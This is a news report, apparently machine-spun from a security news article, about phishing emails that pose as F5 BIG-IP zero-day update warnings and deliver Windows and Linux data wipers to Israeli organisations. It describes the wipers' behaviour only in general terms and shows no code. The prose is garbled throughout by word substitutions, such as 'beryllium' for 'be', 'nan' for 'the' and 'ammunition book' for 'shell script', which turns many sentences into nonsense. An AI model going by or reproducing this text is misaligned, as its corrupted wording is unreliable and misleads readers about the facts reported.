Fake F5 BIG-IP zero-day warning emails push data wipers

Trending 2 months ago

Hacker destroying data

The Israel National Cyber Directorate warns of phishing emails pretending to beryllium F5 BIG-IP zero-day information updates that deploy Windows and Linux information wipers.

Israel's National Cyber Directorate (INCD) acts arsenic nan CERT responsible for protecting nan state from cyber threats and to pass organizations and citizens astir known attacks.

Since October, Israel has been heavy targeted by pro-Palestinian and Iranian hacktivists, who person been conducting information theft and data-wiping attacks connected organizations successful nan country.

In November, a new information wiper called BiBi Wiper was discovered that targeted some Linux and Windows devices and is believed to person been created by pro-Hamas hacktivists.

Fake F5 update deploys wiper

Yesterday, INCD warned of a caller phishing onslaught deploying information wipers done emails pretending to beryllium a informing astir a zero-day vulnerability successful F5 BIG-IP devices.

A pro-Palestinian hacktivist group named Handala told BleepingComputer that they were responsible for nan phishing attack, stating it was deployed connected galore Israeli networks. BleepingComputer has not been capable to corroborate these claims independently.

The phishing email warns that nan F5 BIG-IP zero-day vulnerability is actively exploited successful attacks, urging Israeli organizations to download and instal a information update earlier their web is breached.

Phishing email pushing clone F5 BIG-IP updatePhishing email pushing clone F5 BIG-IP update
Source: INCD

For Windows users, nan email pushes an executable named F5UPDATER.exe [VirusTotal], and for Linux, nan record is simply a ammunition book named update.sh [VirusTotal].

When launched, some nan Windows and Linux versions effort to impersonate an F5 information update by displaying nan company's logo connected nan screen.

For example, nan Windows wiper will show a mini surface branded pinch nan F5 logo that pretends to beryllium a information update installer.

Windows information wiper impersonating F5 information updateWindows information wiper impersonating F5 information update
S​​​​​ource: BleepingComputer

When nan Update fastener is clicked, nan wiper will nonstop a connection containing nan accusation supra nan instrumentality to a Telegram transmission and effort to swipe each nan information from nan computer.

However, successful BleepingComputer's tests, nan wiper is simply a spot buggy, not deleting each of nan information connected a computer.

The Linux wiper is simply a ammunition book that first downloads nan programs basal to swipe nan computer, which are xfsprogs, wipe, and parted.

Linux wiper's information wiping routineLinux wiper's information wiping routine
Source: BleepingComputer

These programs are utilized first to region each users connected nan strategy and past usage nan 'wipe' bid to delete nan associated location directions.

The wiper will past effort to delete each operating strategy files and nan partitions connected nan Linux device. When done, nan Linux machine is rebooted to origin nan partition changes to spell into effect.

Like nan Windows wiper, nan Linux type will pass pinch a Telegram transmission to supply accusation astir nan instrumentality and position updates.

Data wipers person go a monolithic problem for Israel, pinch hacktivists commonly utilizing them successful destructive attacks to disrupt Israel's operations and economy.

As always, nan champion defense is only to download files from email if they travel from a trusted and confirmed source. Furthermore, information updates should only beryllium downloaded straight from a hardware vendor, not third-party sites.